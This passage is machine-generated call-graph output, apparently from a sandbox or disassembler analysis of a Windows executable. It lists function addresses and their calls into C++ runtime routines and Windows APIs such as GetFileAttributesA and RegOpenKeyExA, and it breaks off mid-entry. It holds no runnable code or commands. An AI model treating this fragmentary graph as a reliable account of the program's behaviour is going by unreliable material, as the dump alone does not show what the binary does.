46509 40db60 RaiseException Concurrency::cancel_current_task 46497->46509 46500 41d950 std::bad_exception::bad_exception 46 API calls 46499->46500 46502 5013fb 46500->46502 46501->46502 46503 53ee6e std::_Facet_Register 17 API calls 46501->46503 46502->46485 46503->46502 46504->46482 46505->46490 46506->46491 46507->46490 46508->46494 46509->46496 46510 4366c0 46511 4366e9 46510->46511 46513 436720 46510->46513 46512 53f1aa 3 API calls 46511->46512 46516 4366f3 _Error_objects 46512->46516 46514 43679d _Error_objects 46513->46514 46672 4f57c0 46 API calls 46513->46672 46518 53f1aa 3 API calls 46514->46518 46521 436804 46514->46521 46516->46513 46670 53f0da 46 API calls _Error_objects 46516->46670 46523 4367d7 _Error_objects 46518->46523 46519 436713 46671 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 46519->46671 46527 436881 46521->46527 46675 4f57c0 46 API calls 46521->46675 46523->46521 46673 53f0da 46 API calls _Error_objects 46523->46673 46525 4367f7 46674 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 46525->46674 46528 4187e0 46 API calls 46527->46528 46529 436a38 46528->46529 46530 417380 Concurrency::wait 46 API calls 46529->46530 46531 436a90 Concurrency::wait 46530->46531 46532 414e70 std::ios_base::clear 46 API calls 46531->46532 46533 436aab Concurrency::wait 46532->46533 46533->46533 46534 417380 Concurrency::wait 46 API calls 46533->46534 46535 436b12 Concurrency::wait 46534->46535 46536 414e70 std::ios_base::clear 46 API calls 46535->46536 46537 436b37 Concurrency::wait 46536->46537 46538 433be0 92 API calls 46537->46538 46539 436b4f 46538->46539 46540 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46539->46540 46541 436b5d 46540->46541 46542 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46541->46542 46543 436b68 46542->46543 46544 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46543->46544 46545 436b73 46544->46545 46546 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46545->46546 46547 436b7e 46546->46547 46548 414fd0 std::ios_base::clear 46 API calls 46547->46548 46550 436b8e 46548->46550 46549 436bdf 46552 436c70 46549->46552 46676 4ef210 46 API calls 46549->46676 46550->46549 46551 414e70 std::ios_base::clear 46 API calls 46550->46551 46551->46549 46554 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46552->46554 46569 436c7b Concurrency::wait 46554->46569 46555 436c25 46677 4172e0 46 API calls ctype 46555->46677 46556 436de9 46559 437942 46556->46559 46562 53f1aa 3 API calls 46556->46562 46564 436e43 46556->46564 46558 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46558->46556 46560 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46559->46560 46561 43794d 46560->46561 46563 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46561->46563 46574 436e16 _Error_objects 46562->46574 46565 437955 46563->46565 46570 436ec3 46564->46570 46680 4f57c0 46 API calls 46564->46680 46567 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46565->46567 46571 43795d 46567->46571 46573 41a1e0 Concurrency::wait 46 API calls 46569->46573 46575 436d96 46569->46575 46681 4f47f0 59 API calls 46570->46681 46572 436f04 46577 53f1aa 3 API calls 46572->46577 46580 436f55 46572->46580 46573->46575 46574->46564 46678 53f0da 46 API calls _Error_objects 46574->46678 46575->46556 46575->46558 46585 436f28 _Error_objects 46577->46585 46578 436e36 46679 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 46578->46679 46583 436fd5 46580->46583 46684 4f57c0 46 API calls 46580->46684 46685 4ed810 46 API calls 46583->46685 46584 43700b 46686 4ed7d0 46 API calls 46584->46686 46585->46580 46682 53f0da 46 API calls _Error_objects 46585->46682 46588 43701d 46687 4f35f0 43 API calls __Getctype 46588->46687 46589 436f48 46683 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 46589->46683 46592 437057 46669 437818 46592->46669 46688 436600 46 API calls std::bad_exception::bad_exception 46592->46688 46593 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46595 437828 46593->46595 46597 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46595->46597 46596 437095 46689 4f36a0 43 API calls __Getctype 46596->46689 46599 437833 46597->46599 46601 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46599->46601 46600 4370a0 46690 4f4600 46 API calls 3 library calls 46600->46690 46602 43783e 46601->46602 46604 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46602->46604 46606 437849 46604->46606 46605 437143 46691 4f48c0 46 API calls 46605->46691 46609 53f1aa 3 API calls 46606->46609 46611 437897 46606->46611 46608 43715b 46692 4f36a0 43 API calls __Getctype 46608->46692 46615 43786a _Error_objects 46609->46615 46614 437917 46611->46614 46709 4f57c0 46 API calls 46611->46709 46710 4f1460 46 API calls 3 library calls 46614->46710 46615->46611 46707 53f0da 46 API calls _Error_objects 46615->46707 46617 437166 46693 4f4600 46 API calls 3 library calls 46617->46693 46618 43788a 46708 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 46618->46708 46621 437216 Concurrency::wait 46694 506eb0 46 API calls __Getctype 46621->46694 46623 437266 Concurrency::wait Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 46695 420e20 14 API calls 4 library calls 46623->46695 46625 43746f 46626 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46625->46626 46627 43747d 46626->46627 46698 4f36a0 43 API calls __Getctype 46627->46698 46630 437460 46632 54eeae ___std_exception_copy 14 API calls 46630->46632 46631 437338 __aulldiv __vswprintf_s_l 46631->46625 46696 4210e0 14 API calls 4 library calls 46631->46696 46632->46625 46633 437488 46699 4f4600 46 API calls 3 library calls 46633->46699 46634 437402 46634->46630 46697 4172e0 46 API calls ctype 46634->46697 46636 437457 46638 54eeae ___std_exception_copy 14 API calls 46636->46638 46638->46630 46639 437538 Concurrency::wait 46700 506eb0 46 API calls __Getctype 46639->46700 46642 437588 Concurrency::wait Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 46701 420e20 14 API calls 4 library calls 46642->46701 46643 437791 46644 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46643->46644 46645 43779f 46644->46645 46704 4fb680 46 API calls std::bad_exception::bad_exception 46645->46704 46648 4377c7 46705 4f4f10 46 API calls 46648->46705 46650 437782 46653 54eeae ___std_exception_copy 14 API calls 46650->46653 46651 43765a __aulldiv __vswprintf_s_l 46651->46643 46702 4210e0 14 API calls 4 library calls 46651->46702 46652 4377d6 46706 437ae0 43 API calls Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46652->46706 46653->46643 46655 437724 46655->46650 46703 4172e0 46 API calls ctype 46655->46703 46656 4377e1 46658 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46656->46658 46660 4377ec 46658->46660 46659 437779 46661 54eeae ___std_exception_copy 14 API calls 46659->46661 46662 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46660->46662 46661->46650 46663 4377f7 46662->46663 46664 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46663->46664 46665 437802 46664->46665 46666 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46665->46666 46667 43780d 46666->46667 46668 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46667->46668 46668->46669 46669->46593 46670->46519 46671->46513 46672->46514 46673->46525 46674->46521 46675->46527 46676->46555 46677->46552 46678->46578 46679->46564 46680->46570 46681->46572 46682->46589 46683->46580 46684->46583 46685->46584 46686->46588 46687->46592 46688->46596 46689->46600 46690->46605 46691->46608 46692->46617 46693->46621 46694->46623 46695->46631 46696->46634 46697->46636 46698->46633 46699->46639 46700->46642 46701->46651 46702->46655 46703->46659 46704->46648 46705->46652 46706->46656 46707->46618 46708->46611 46709->46614 46710->46559 46711 43e340 46728 43e349 Concurrency::wait Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46711->46728 46712 43e897 46713 553323 43 API calls 46712->46713 46715 43e8bb 46713->46715 46717 4150c0 std::bad_exception::bad_exception 46 API calls 46715->46717 46716 53ee6e std::_Facet_Register 17 API calls 46716->46728 46718 43e8ea 46717->46718 46719 4f2110 43 API calls 46718->46719 46720 43e882 46719->46720 46721 4187e0 46 API calls 46721->46728 46722 4f5c80 46 API calls 46722->46728 46723 417380 Concurrency::wait 46 API calls 46723->46728 46724 41a1e0 46 API calls Concurrency::wait 46724->46728 46725 509bd0 70 API calls 46725->46728 46726 417140 43 API calls Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46726->46728 46728->46712 46728->46716 46728->46721 46728->46722 46728->46723 46728->46724 46728->46725 46728->46726 46729 43e851 46728->46729 46735 553323 46728->46735 46738 4ee570 43 API calls 2 library calls 46728->46738 46730 4150c0 std::bad_exception::bad_exception 46 API calls 46729->46730 46731 43e86f 46730->46731 46732 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46731->46732 46733 43e87a 46732->46733 46739 4f2110 46733->46739 46745 55af41 GetLastError 46735->46745 46738->46728 46741 4f21cd Concurrency::wait 46739->46741 46744 4f2149 Concurrency::wait 46739->46744 46740 4f218b 46740->46741 46782 40dc20 43 API calls Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46740->46782 46741->46720 46742 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46742->46744 46744->46740 46744->46742 46746 55af57 46745->46746 46752 55af5d 46745->46752 46774 55b9c6 6 API calls std::_Lockit::_Lockit 46746->46774 46749 55af79 46750 55af81 46749->46750 46751 55af61 46749->46751 46776 55d0d9 14 API calls 3 library calls 46750->46776 46753 55afe6 SetLastError 46751->46753 46752->46751 46775 55ba05 6 API calls std::_Lockit::_Lockit 46752->46775 46756 55aff6 46753->46756 46757 553328 46753->46757 46755 55af8e 46758 55afa7 46755->46758 46759 55af96 46755->46759 46781 554404 43 API calls std::locale::_Setgloballocale 46756->46781 46757->46728 46778 55ba05 6 API calls std::_Lockit::_Lockit 46758->46778 46777 55ba05 6 API calls std::_Lockit::_Lockit 46759->46777 46764 55afa4 46768 55b421 ___std_exception_copy 14 API calls 46764->46768 46765 55afb3 46766 55afb7 46765->46766 46767 55afce 46765->46767 46779 55ba05 6 API calls std::_Lockit::_Lockit 46766->46779 46780 55ad6f 14 API calls __Getctype 46767->46780 46771 55afcb 46768->46771 46771->46753 46772 55afd9 46773 55b421 ___std_exception_copy 14 API calls 46772->46773 46773->46771 46774->46752 46775->46749 46776->46755 46777->46764 46778->46765 46779->46764 46780->46772 46782->46741 46783 434b20 46784 434b36 46783->46784 46785 53ee6e std::_Facet_Register 17 API calls 46784->46785 46786 434b40 __aulldiv Concurrency::wait __vswprintf_s_l 46785->46786 46786->46786 46787 4f5c80 46 API calls 46786->46787 46788 434ce5 46787->46788 46789 414fd0 std::ios_base::clear 46 API calls 46788->46789 46790 434cf4 46789->46790 46791 4150c0 std::bad_exception::bad_exception 46 API calls 46790->46791 46792 434d09 46791->46792 46793 509bd0 70 API calls 46792->46793 46794 434d19 46793->46794 46795 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46794->46795 46796 434d24 46795->46796 46797 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46796->46797 46798 434d2c 46797->46798 46799 451720 46800 45173d __aulldiv _memcpy_s Concurrency::wait __vswprintf_s_l 46799->46800 46800->46800 46801 41a1e0 Concurrency::wait 46 API calls 46800->46801 46805 4518e4 Concurrency::wait 46801->46805 46802 451aff 47179 4186f0 46802->47179 46804 451bc9 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 47185 42c670 46804->47185 46805->46802 46806 41a1e0 Concurrency::wait 46 API calls 46805->46806 46808 451ae2 46806->46808 46810 414e70 std::ios_base::clear 46 API calls 46808->46810 46809 451bd9 46811 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46809->46811 46812 451af4 46810->46812 46813 451be7 46811->46813 46814 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46812->46814 46815 451bef 46813->46815 46818 451c0f 46813->46818 46814->46802 46816 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46815->46816 46817 451c04 46816->46817 46819 4186f0 46 API calls 46818->46819 46820 451cd9 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46819->46820 46821 42c670 2 API calls 46820->46821 46822 451ce9 46821->46822 46823 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46822->46823 46824 451cf7 46823->46824 46825 451cff 46824->46825 46827 451d1f 46824->46827 46826 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46825->46826 46826->46817 46828 4186f0 46 API calls 46827->46828 46829 451de9 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46828->46829 46830 42c670 2 API calls 46829->46830 46831 451df9 46830->46831 46832 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46831->46832 46833 451e07 46832->46833 46834 451e0f 46833->46834 46836 451e2f 46833->46836 46835 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46834->46835 46835->46817 46837 4186f0 46 API calls 46836->46837 46838 451ef9 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46837->46838 46839 42c670 2 API calls 46838->46839 46840 451f09 46839->46840 46841 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46840->46841 46842 451f17 46841->46842 46843 451f1f 46842->46843 46845 451f3f 46842->46845 46844 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46843->46844 46844->46817 46846 4186f0 46 API calls 46845->46846 46847 452009 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46846->46847 46848 42c670 2 API calls 46847->46848 46849 452019 46848->46849 46850 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46849->46850 46851 452027 46850->46851 46852 45202f 46851->46852 46854 45204f 46851->46854 46853 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46852->46853 46853->46817 46855 4186f0 46 API calls 46854->46855 46856 452119 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46855->46856 46857 42c670 2 API calls 46856->46857 46858 452129 46857->46858 46859 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46858->46859 46860 452137 46859->46860 46861 45213f 46860->46861 46863 45215f 46860->46863 46862 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46861->46862 46862->46817 46864 4186f0 46 API calls 46863->46864 46865 452229 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46864->46865 46866 42c670 2 API calls 46865->46866 46867 452239 46866->46867 46868 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46867->46868 46869 452247 46868->46869 46870 45224f 46869->46870 46872 45226f 46869->46872 46871 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46870->46871 46871->46817 46873 4186f0 46 API calls 46872->46873 46874 452339 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46873->46874 46875 42c670 2 API calls 46874->46875 46876 452349 46875->46876 46877 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46876->46877 46878 452357 46877->46878 46879 45235f 46878->46879 46881 45237f 46878->46881 46880 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46879->46880 46880->46817 46882 4186f0 46 API calls 46881->46882 46883 452449 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46882->46883 46884 42c670 2 API calls 46883->46884 46885 452459 46884->46885 46886 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46885->46886 46887 452467 46886->46887 46888 45246f 46887->46888 46890 45248f 46887->46890 46889 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46888->46889 46889->46817 46891 4186f0 46 API calls 46890->46891 46892 452559 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46891->46892 46893 42c670 2 API calls 46892->46893 46894 452569 46893->46894 46895 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46894->46895 46896 452577 46895->46896 46897 45257f 46896->46897 46899 45259f __aulldiv _memcpy_s Concurrency::wait __vswprintf_s_l 46896->46899 46898 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46897->46898 46898->46817 46900 41a1e0 Concurrency::wait 46 API calls 46899->46900 46901 45281e 46900->46901 47190 442970 46901->47190 47180 41870e std::bad_exception::bad_exception 47179->47180 47180->47180 47181 418744 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 47180->47181 47284 40dc90 45 API calls std::bad_exception::bad_exception 47180->47284 47183 41b790 46 API calls 47181->47183 47184 418776 47183->47184 47184->46804 47186 42c682 47185->47186 47189 42c6ae __aulldiv __vswprintf_s_l 47185->47189 47187 42c6b5 GetFileAttributesA 47186->47187 47186->47189 47188 42c6d2 GetLastError 47187->47188 47187->47189 47188->47189 47189->46809 47191 442998 47190->47191 47193 4429cf 47190->47193 47192 53f1aa 3 API calls 47191->47192 47196 4429a2 _Error_objects 47192->47196 47195 442a3a _Error_objects 47193->47195 47287 4f57c0 46 API calls 47193->47287 47198 414fd0 std::ios_base::clear 46 API calls 47195->47198 47196->47193 47285 53f0da 46 API calls _Error_objects 47196->47285 47201 442a64 47198->47201 47199 4429c2 47286 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 47199->47286 47202 442aac 47201->47202 47203 414e70 std::ios_base::clear 46 API calls 47201->47203 47204 442b34 47202->47204 47288 4ef210 46 API calls 47202->47288 47203->47202 47205 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 47204->47205 47209 442b3f __aulldiv Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 47205->47209 47207 442ae9 47289 4172e0 46 API calls ctype 47207->47289 47210 442cc6 RegOpenKeyExA 47209->47210 47284->47181 47285->47199 47286->47193 47287->47195 47288->47207 47289->47204 47301 46d6e0 47302 46d6ed Concurrency::wait _Error_objects 47301->47302 47303 41a1e0 Concurrency::wait 46 API calls 47302->47303 47304 46d815 47303->47304 47305 4f5470 46 API calls 47304->47305 47306 46d824 47305->47306 47307 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 47306->47307 47308 46d82f Concurrency::wait 47307->47308 47309 41a1e0 Concurrency::wait 46 API calls 47308->47309 47310 46d960 47309->47310 47311 4f5470 46 API calls 47310->47311 47312 46d96f 47311->47312 47313 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 47312->47313 47314 46d97a Concurrency::wait 47313->47314 47315 41a1e0 Concurrency::wait 46 API calls 47314->47315 47316 46daab 47315->47316 47317 4f5470 46 API calls 47316->47317 47318 46daba 47317->47318 47319 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 47318->47319 47320 46dac5 Concurrency::wait 47319->47320 47321 41a1e0 Concurrency::wait 46 API calls 47320->47321 47322 46dbf6 47321->47322 47323 4f5470 46 API calls 47322->47323 47324 46dc05 47323->47324 47325 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 47324->47325 47326 46dc10 Concurrency::wait 47325->47326 47327 41a1e0 Concurrency::wait 46 API calls 47326->47327 47328 46dd41 47327->47328 47329 4f5470 46 API calls 47328->47329 47330 46dd50 47329->47330 47331 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 47330->47331 47332 46dd5b Concurrency::wait 47331->47332 47333 41a1e0 Concurrency::wait 46 API calls 47332->47333 47334 46de8c 47333->47334 47335 4f5470 46 API calls 47334->47335 47336 46de9b 47335->47336 47337 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 47336->47337 47338 46dea6 Concurrency::wait 47337->47338 47339 41a1e0 Concurrency::wait 46 API calls 47338->47339 47340 46dfd7 47339->47340 47341 4f5470 46 API calls 47340->47341 47342 46dfe6 47341->47342 47343 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 47342->47343 47344 46dff1 Concurrency::wait 47343->47344 47345 41a1e0 Concurrency::wait 46 API calls 47344->47345 47346 46e122 47345->47346 47347 4f5470 46 API calls 47346->47347 47348 46e131 47347->47348 47349 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 47348->47349 47350 46e13c Concurrency::wait 47349->47350 47351 41a1e0 Concurrency::wait 46 API calls 47350->47351 47352 46e26d 47351->47352 47353 4f5470 46 API calls 47352->47353 47354 46e27c 47353->47354 47355 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 47354->47355 47356 46e287 Concurrency::wait 47355->47356 47357 41a1e0 Concurrency::wait 46 API calls 47356->47357 47358 46e3b8 47357->47358 47359 4f5470 46 API calls 47358->47359 47360 46e3c7 47359->47360 47361 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 47360->47361 47362 46e3d2 Concurrency::wait 47361->47362 47363 41a1e0 Concurrency::wait 46 API calls 47362->47363 47364 46e503 47363->47364 47365 4f5470 46 API calls 47364->47365 47366 46e512 47365->47366 47367 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 47366->47367 47368 46e51d Concurrency::wait 47367->47368 47369 41a1e0 Concurrency::wait 46 API calls 47368->47369 47370 46e64e 47369->47370 47371 4f5470 46 API calls 47370->47371 47372 46e65d 47371->47372 47373 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 47372->47373 47374 46e668 Concurrency::wait 47373->47374 47375 41a1e0 Concurrency::wait 46 API calls 47374->47375 47376 46e799 47375->47376 47377 4f5470 46 API calls 47376->47377 47378 46e7a8 47377->47378 47379 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 47378->47379 47380 46e7b3 Concurrency::wait 47379->47380 47381 41a1e0 Concurrency::wait 46 API calls 47380->47381 47382 46e8e4 47381->47382 47383 4f5470 46 API calls 47382->47383 47384 46e8f3 47383->47384 47385 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 47384->47385 47386 46e8fe Concurrency::wait 47385->47386 47387 41a1e0 Concurrency::wait 46 API calls 47386->47387 47388 46ea2f 47387->47388 47389 4f5470 46 API calls 47388->47389 47390 46ea3e 47389->47390 47391 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 47390->47391 47392 46ea49 Concurrency::wait 47391->47392 48153 47eb60 48154 47eb72 Concurrency::wait _Error_objects 48153->48154 48155 41a1e0 Concurrency::wait 46 API calls 48154->48155 48156 47ec82 48155->48156 48157 4f5470 46 API calls 48156->48157 48158 47ec91 48157->48158 48159 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48158->48159 48160 47ec9c __aulldiv _memcpy_s Concurrency::wait __vswprintf_s_l 48159->48160 48161 41a1e0 Concurrency::wait 46 API calls 48160->48161 48162 47eee8 48161->48162 48163 442970 58 API calls 48162->48163 48165 47eef4 Concurrency::wait 48163->48165 48164 47f2ac Concurrency::wait 48166 41a1e0 Concurrency::wait 46 API calls 48164->48166 48165->48164 48167 41a1e0 Concurrency::wait 46 API calls 48165->48167 48168 47f3b8 48166->48168 48169 47f064 48167->48169 48170 442970 58 API calls 48168->48170 48171 4f89a0 46 API calls 48169->48171 48177 47f3c4 Concurrency::wait 48170->48177 48172 47f0b5 Concurrency::wait 48171->48172 48173 414e70 std::ios_base::clear 46 API calls 48172->48173 48174 47f0df Concurrency::wait 48173->48174 48176 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48174->48176 48175 47f7db Concurrency::wait 48179 41a1e0 Concurrency::wait 46 API calls 48175->48179 48178 47f0f6 48176->48178 48177->48175 48180 41a1e0 Concurrency::wait 46 API calls 48177->48180 48181 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48178->48181 48182 47f91a 48179->48182 48183 47f543 48180->48183 48186 47f101 48181->48186 48184 442970 58 API calls 48182->48184 48185 4f89a0 46 API calls 48183->48185 48199 47f926 Concurrency::wait 48184->48199 48187 47f5a3 Concurrency::wait 48185->48187 48188 4186f0 46 API calls 48186->48188 48190 414e70 std::ios_base::clear 46 API calls 48187->48190 48189 47f1a6 48188->48189 48191 440f20 98 API calls 48189->48191 48192 47f5cd Concurrency::wait 48190->48192 48207 47f1b5 48191->48207 48196 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48192->48196 48193 47f296 48195 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48193->48195 48194 47fd6c Concurrency::wait 48203 41a1e0 Concurrency::wait 46 API calls 48194->48203 48197 47f2a1 48195->48197 48198 47f5e4 48196->48198 48200 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48197->48200 48201 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48198->48201 48199->48194 48202 41a1e0 Concurrency::wait 46 API calls 48199->48202 48200->48164 48211 47f5ef 48201->48211 48204 47fac9 48202->48204 48205 47feab 48203->48205 48212 4f89a0 46 API calls 48204->48212 48208 442970 58 API calls 48205->48208 48206 47f242 48209 4150c0 std::bad_exception::bad_exception 46 API calls 48206->48209 48207->48193 48207->48206 48233 47feb7 Concurrency::wait 48208->48233 48210 47f260 48209->48210 48213 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48210->48213 48217 4186f0 46 API calls 48211->48217 48215 47fb29 Concurrency::wait 48212->48215 48214 47f26b 48213->48214 48216 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48214->48216 48220 414e70 std::ios_base::clear 46 API calls 48215->48220 48219 47f276 48216->48219 48218 47f6b8 48217->48218 48221 440f20 98 API calls 48218->48221 48222 4f2110 43 API calls 48219->48222 48223 47fb53 Concurrency::wait 48220->48223 48239 47f6c7 48221->48239 48224 47f281 48222->48224 48230 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48223->48230 48226 4f2110 43 API calls 48224->48226 48225 47f7c5 48229 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48225->48229 48227 47f289 48226->48227 48228 480308 __aulldiv _memcpy_s __vswprintf_s_l 48237 414fd0 std::ios_base::clear 46 API calls 48228->48237 48231 47f7d0 48229->48231 48232 47fb6a 48230->48232 48234 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48231->48234 48235 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48232->48235 48233->48228 48236 41a1e0 Concurrency::wait 46 API calls 48233->48236 48234->48175 48243 47fb75 48235->48243 48240 48005a 48236->48240 48259 480464 48237->48259 48238 47f763 48241 4150c0 std::bad_exception::bad_exception 46 API calls 48238->48241 48239->48225 48239->48238 48245 4f89a0 46 API calls 48240->48245 48242 47f784 48241->48242 48244 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48242->48244 48248 4186f0 46 API calls 48243->48248 48246 47f78f 48244->48246 48247 4800ba Concurrency::wait 48245->48247 48249 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48246->48249 48254 414e70 std::ios_base::clear 46 API calls 48247->48254 48250 47fc3e 48248->48250 48251 47f79a 48249->48251 48252 440f20 98 API calls 48250->48252 48253 4f2110 43 API calls 48251->48253 48273 47fc4d 48252->48273 48255 47f7a5 48253->48255 48256 4800e4 Concurrency::wait 48254->48256 48258 4f2110 43 API calls 48255->48258 48264 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48256->48264 48257 47fd56 48262 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48257->48262 48260 47f7b0 48258->48260 48261 480616 48259->48261 48268 414fd0 std::ios_base::clear 46 API calls 48259->48268 48263 4f2110 43 API calls 48260->48263 48267 4186f0 46 API calls 48261->48267 48265 47fd61 48262->48265 48263->48227 48266 4800fb 48264->48266 48269 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48265->48269 48270 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 48266->48270 48271 4806e0 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 48267->48271 48272 4805f3 48268->48272 48269->48194 48282 480106 48270->48282 48279 42c670 2 API calls 48271->48279 48275 414e70 std::ios_base::clear 46 API calls 48272->48275 48273->48257 48274 47fce9 48273->48274 48276 4150c0 std::bad_exception::bad_exception 46 API calls 48274->48276 48277 48060b 48275->48277 48278 47fd0a 48276->48278 48280 417140 